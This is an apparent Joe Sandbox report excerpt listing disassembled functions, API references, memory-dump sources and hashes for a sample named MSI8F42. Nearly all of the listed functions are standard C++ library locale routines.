                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2372200979-0
                                                                                                                                            • Opcode ID: d4a30ec31b488b1878458eb66d3481c3fd9cf11df925b8aae8bc6d85b08c68c9
                                                                                                                                            • Instruction ID: 9650da863da2e044e85205d7bc7b91c66c2e731040aabc95aa7139bd62a79de1
                                                                                                                                            • Opcode Fuzzy Hash: d4a30ec31b488b1878458eb66d3481c3fd9cf11df925b8aae8bc6d85b08c68c9
                                                                                                                                            • Instruction Fuzzy Hash: E361E0B5C10649CFDB22CF68C940BAAFBF4FF14714F148269D945AB391EB34AA44CB91
                                                                                                                                            Function 002F9270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F92A0
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002F92C2
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002F92EA
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000018,00000000,7642E7B1,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 002F9342
                                                                                                                                            • __Getctype.LIBCPMT ref: 002F93BD
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002F93F8
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002F9422
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2372200979-0
                                                                                                                                            • Opcode ID: e20c284404df93b0e800ceabc1844039dc0c73d0268bf029928178bebc731b95
                                                                                                                                            • Instruction ID: e6ddebb528ca142a67b280dbf27dbc6b4afe00e40fdffc1a9915275db325df21
                                                                                                                                            • Opcode Fuzzy Hash: e20c284404df93b0e800ceabc1844039dc0c73d0268bf029928178bebc731b95
                                                                                                                                            • Instruction Fuzzy Hash: 9951DE70D14209DFDB26CF68C844BAEBBF4EF14754F1081A9E945AB391DB70AE80CB91
                                                                                                                                            Function 002F6FB0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 002F6FB7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast
                                                                                                                                            • String ID: <S4$<S4$<S4$> returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                            • API String ID: 1452528299-3942388407
                                                                                                                                            • Opcode ID: e2cd86791a0139fae32c9820534ce95ed08bf300f69b564d75ce500fd9e7f0ec
                                                                                                                                            • Instruction ID: e46af84cb09c86dc21fcd6a7502de9949cb9319ce71c8cb8ff7b326273de2651
                                                                                                                                            • Opcode Fuzzy Hash: e2cd86791a0139fae32c9820534ce95ed08bf300f69b564d75ce500fd9e7f0ec
                                                                                                                                            • Instruction Fuzzy Hash: B621625DE2022687CB341F689405339E2E0EF64B94F65087FD9C9DB391EAA98C928395
                                                                                                                                            Function 002FD87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002FD883
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FD88D
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • numpunct.LIBCPMT ref: 002FD8C7
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FD8DE
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FD8FE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 743221004-1316489359
                                                                                                                                            • Opcode ID: 7d4953aa6194cfa35b00f5294fe27ffe515563f1901d5615e51529fc8f5d8372
                                                                                                                                            • Instruction ID: 9466c7c291f1b6339cc6208c50f7cf9762309b44c2a6efecbc120a65c76d3900
                                                                                                                                            • Opcode Fuzzy Hash: 7d4953aa6194cfa35b00f5294fe27ffe515563f1901d5615e51529fc8f5d8372
                                                                                                                                            • Instruction Fuzzy Hash: 1111E13991021E9BCF0AFF60D851ABEBB61AF84750F240829E511AF2D1CF70AE118B91
                                                                                                                                            Function 003022FA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302301
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030230B
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • codecvt.LIBCPMT ref: 00302345
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030235C
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030237C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 712880209-1316489359
                                                                                                                                            • Opcode ID: 185fade933aaa7b9b41258db53343965f1e180a7d431af002273fee6c15af11a
                                                                                                                                            • Instruction ID: e49255931e1e1e535d97101abd7d3d4ccd2dddac9e9888c558de60f86d06d918
                                                                                                                                            • Opcode Fuzzy Hash: 185fade933aaa7b9b41258db53343965f1e180a7d431af002273fee6c15af11a
                                                                                                                                            • Instruction Fuzzy Hash: 0C0100398016199BCB1BEB60D865BBEB7A4AF84710F250449F500AF2C1CF349E018B91
                                                                                                                                            Function 0030238F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302396
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003023A0
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • codecvt.LIBCPMT ref: 003023DA
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 003023F1
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302411
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 712880209-1316489359
                                                                                                                                            • Opcode ID: 4e9f20a613cba19c53415a9db42a0904816cfa047df97abf5904df3b1debb1d0
                                                                                                                                            • Instruction ID: e3e7c33c53cc3dda4259892abb6aca33afba0f5b3191ca47df74082e550159fc
                                                                                                                                            • Opcode Fuzzy Hash: 4e9f20a613cba19c53415a9db42a0904816cfa047df97abf5904df3b1debb1d0
                                                                                                                                            • Instruction Fuzzy Hash: D20100399021198BCB0BEB64D865BBEB7A4AF84710F250819E400AF2D1CF749E41CB91
                                                                                                                                            Function 00302424 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030242B
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302435
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • collate.LIBCPMT ref: 0030246F
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302486
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003024A6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 1007100420-1316489359
                                                                                                                                            • Opcode ID: a3acd53f5dc7310cdd9f3f054c1c68305bbeab17fd50d65f4e97775cd6af7437
                                                                                                                                            • Instruction ID: 391815c4e720240900ae33c1dda6ba9f8d1e6e7951b556f6fc2ea818cf81cddd
                                                                                                                                            • Opcode Fuzzy Hash: a3acd53f5dc7310cdd9f3f054c1c68305bbeab17fd50d65f4e97775cd6af7437
                                                                                                                                            • Instruction Fuzzy Hash: 9701D2359021199FCB0BEB60D866BBEBBB4AF84720F250409F500AF2D1DF709E41CB91
                                                                                                                                            Function 003024B9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003024C0
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003024CA
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • collate.LIBCPMT ref: 00302504
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030251B
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030253B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 1007100420-1316489359
                                                                                                                                            • Opcode ID: ce485da2c0ec2caf6b67fc64134651dffd041374fca741436c59de23b6dad557
                                                                                                                                            • Instruction ID: b8c7d36eccedc2a6f6c7d6e1490d79770716bd22bb48aa203661e926ad7ad3cc
                                                                                                                                            • Opcode Fuzzy Hash: ce485da2c0ec2caf6b67fc64134651dffd041374fca741436c59de23b6dad557
                                                                                                                                            • Instruction Fuzzy Hash: 66019E35902119DBCB1BEB64D869ABEB7B5AF98720F250809F510AF2D1CF709E418B91
                                                                                                                                            Function 0030254E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302555
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030255F
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • ctype.LIBCPMT ref: 00302599
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 003025B0
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003025D0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 83828444-1316489359
                                                                                                                                            • Opcode ID: 449eb4a5f6f91b5c89a9932aca54cb5e17765d78589901131721072eeb84c4d2
                                                                                                                                            • Instruction ID: 1edee7a02ee447c688ec809a581d72558ab67f103a0d75a4ee87d82db4e6ae9b
                                                                                                                                            • Opcode Fuzzy Hash: 449eb4a5f6f91b5c89a9932aca54cb5e17765d78589901131721072eeb84c4d2
                                                                                                                                            • Instruction Fuzzy Hash: 9C01D2369021199FCB1BEB60C865ABEBBB4BF84710F250819F410AF2D1DF309E45CB91
                                                                                                                                            Function 003025E3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003025EA
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003025F4
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • messages.LIBCPMT ref: 0030262E
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302645
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302665
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2750803064-1316489359
                                                                                                                                            • Opcode ID: 99c5252eadba2423281d88f1755c16feb6be6d6f343983e939ac56557034ae78
                                                                                                                                            • Instruction ID: 3e94722a932a8cd81055a056747437ee4ed67e0f7db4d530c8d35df8653f4fc6
                                                                                                                                            • Opcode Fuzzy Hash: 99c5252eadba2423281d88f1755c16feb6be6d6f343983e939ac56557034ae78
                                                                                                                                            • Instruction Fuzzy Hash: E701D23590111D9BCB0BEB60D869ABEB7B4BF84710F250409F810AF2D1CF709E01CB91
                                                                                                                                            Function 00302678 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030267F
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302689
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • messages.LIBCPMT ref: 003026C3
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 003026DA
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003026FA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2750803064-1316489359
                                                                                                                                            • Opcode ID: 1cb0be59f3fe41ebe8f3fa422cfddc7a186878f9e4c9bc0a267b1af74fbfe5db
                                                                                                                                            • Instruction ID: 5d5ed6b9eec231cbed28377cbb971d3c88803719d5a136941cd031f7505aa170
                                                                                                                                            • Opcode Fuzzy Hash: 1cb0be59f3fe41ebe8f3fa422cfddc7a186878f9e4c9bc0a267b1af74fbfe5db
                                                                                                                                            • Instruction Fuzzy Hash: 3301C0359021199FCF1BEB64C865BBEB7B4AF88710F25080AF510AF2D1CF70AE018B91
                                                                                                                                            Function 002FD6BD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002FD6C4
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FD6CE
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • codecvt.LIBCPMT ref: 002FD708
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FD71F
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FD73F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 712880209-1316489359
                                                                                                                                            • Opcode ID: e48c3e379a0939574698c9ce40bd87647ef6a730150ad93c37c3e9512cc4391b
                                                                                                                                            • Instruction ID: e25f0747a1fbd14991d83d95e68a9a78d7ace6381699bfbb52f16c9f47c57be1
                                                                                                                                            • Opcode Fuzzy Hash: e48c3e379a0939574698c9ce40bd87647ef6a730150ad93c37c3e9512cc4391b
                                                                                                                                            • Instruction Fuzzy Hash: C101C03991011D9BCB1AFB60C851ABEFBA5BF84750F250819E500AF2D2CF70AE018B91
                                                                                                                                            Function 0030E843 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030E84A
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030E854
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • collate.LIBCPMT ref: 0030E88E
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030E8A5
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030E8C5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 1007100420-1316489359
                                                                                                                                            • Opcode ID: 84eedc030d1b432e8fe68151f0f7d8267699d3653a96c735a7458809a40830d8
                                                                                                                                            • Instruction ID: 624a34f03341b446e1dbb27de5d2c00fe2258c26937f4cd58544e726a364c90c
                                                                                                                                            • Opcode Fuzzy Hash: 84eedc030d1b432e8fe68151f0f7d8267699d3653a96c735a7458809a40830d8
                                                                                                                                            • Instruction Fuzzy Hash: 3B01C435A011299FCB0BEB64C861ABEB7B4AF84710F254819F400AF2D1CF309E018B91
                                                                                                                                            Function 0030E8D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030E8DF
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030E8E9
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • messages.LIBCPMT ref: 0030E923
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030E93A
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030E95A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
